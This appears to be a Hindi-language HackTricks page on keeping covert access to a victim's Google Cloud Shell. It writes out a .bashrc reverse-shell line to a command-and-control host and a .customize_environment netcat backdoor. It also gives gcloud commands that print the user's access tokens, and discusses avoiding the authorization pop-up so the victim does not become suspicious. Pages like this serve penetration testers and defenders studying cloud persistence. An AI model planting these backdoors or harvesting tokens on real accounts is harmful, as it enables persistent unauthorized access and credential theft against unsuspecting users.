GCP - Cloud Shell Persistence

हैकट्रिक्स का समर्थन करें

क्लाउड शैल

अधिक जानकारी के लिए देखें:

GCP - Cloud Shell Enum

स्थायी बैकडोर

Google Cloud Shell आपको अपने क्लाउड संसाधनों तक अपने ब्राउज़र से सीधे कमांड लाइन एक्सेस प्रदान करता है बिना किसी जुड़े लागत के।

आप वेब कॉन्सोल से या gcloud cloud-shell ssh चला कर Google के Cloud Shell तक पहुंच सकते हैं।

इस कॉन्सोल में हमलावरों के लिए कुछ दिलचस्प क्षमताएँ हैं:

  1. किसी भी Google उपयोगकर्ता को Google Cloud तक पहुंच होती है एक पूरी तरह से प्रमाणित क्लाउड शैल इंस्टेंस (सर्विस अकाउंट्स, संगठन के मालिक होने के बावजूद भी, हो सकते हैं)।

  2. कहा गया इंस्टेंस कम से कम 120 दिनों तक अपने होम डायरेक्टरी को बनाए रखेगा अगर कोई गतिविधि नहीं होती है।

  3. उस इंस्टेंस की गतिविधि का कोई संगठन की निगरानी करने की क्षमताएँ नहीं हैं।

यह बुनियादी रूप से यह अर्थ है कि एक हमलावर उपयोगकर्ता की होम डायरेक्टरी में एक बैकडोर रख सकता है और जब तक उपयोगकर्ता कम से कम 120 दिनों के अंतराल पर GC शैल से कनेक्ट करता है, बैकडोर बना रहेगा और हमलावर को हर बार जब भी यह चलाया जाता है, शैल मिलेगा बस इसे इस तरह से चलाकर:

echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc

होम फ़ोल्डर में एक और फ़ाइल है जिसका नाम है .customize_environment जो, अगर मौजूद है, तो हर बार चलाया जाएगा जब उपयोगकर्ता क्लाउड शैल तक पहुँचता है (पिछली तकनीक में की तरह)। बस पिछले बैकडोर को डालें या निम्नलिखित जैसा एक बैकडोर डालें ताकि उपयोगकर्ता "अक्सर" क्लाउड शैल का उपयोग करता रहे और स्थिरता बनी रहे:

#!/bin/sh
apt-get install netcat -y
nc <LISTENER-ADDR> 443 -e /bin/bash

यह जरूरी है कि पहली बार एक प्रमाणीकरण की आवश्यकता वाली कोई कार्रवाई की जाती है, तो उपयोगकर्ता के ब्राउज़र में एक पॉप-अप अधिकारीकरण विंडो दिखाई देती है। इस विंडो को स्वीकार किया जाना चाहिए पहले कमांड चल सकता है। अगर अप्रत्याशित पॉप-अप दिखाई देता है, तो यह संदेह उत्पन्न कर सकता है और संभावित रूप से उपयोग किए जा रहे स्थायित्व विधि को क्षति पहुंचा सकता है।

यह उपयोगकर्ता द्वारा ब्राउज़र में देखी जाने वाली क्लाउड शैल (हमलावादी के रूप में) से gcloud projects list को निष्पादित करने पर पॉप-अप है:

हालांकि, अगर उपयोगकर्ता ने सक्रिय रूप से क्लाउडशैल का उपयोग किया है, तो पॉप-अप नहीं दिखाई देगा और आप उपयोगकर्ता के टोकन इकट्ठा कर सकते हैं:

gcloud auth print-access-token
gcloud auth application-default print-access-token

कैसे SSH कनेक्शन स्थापित होता है

मुख्य रूप से, इन 3 API कॉल का उपयोग किया जाता है:

लेकिन आप https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key में अधिक जानकारी पा सकते हैं।

संदर्भ

हैकट्रिक्स का समर्थन करें

Last updated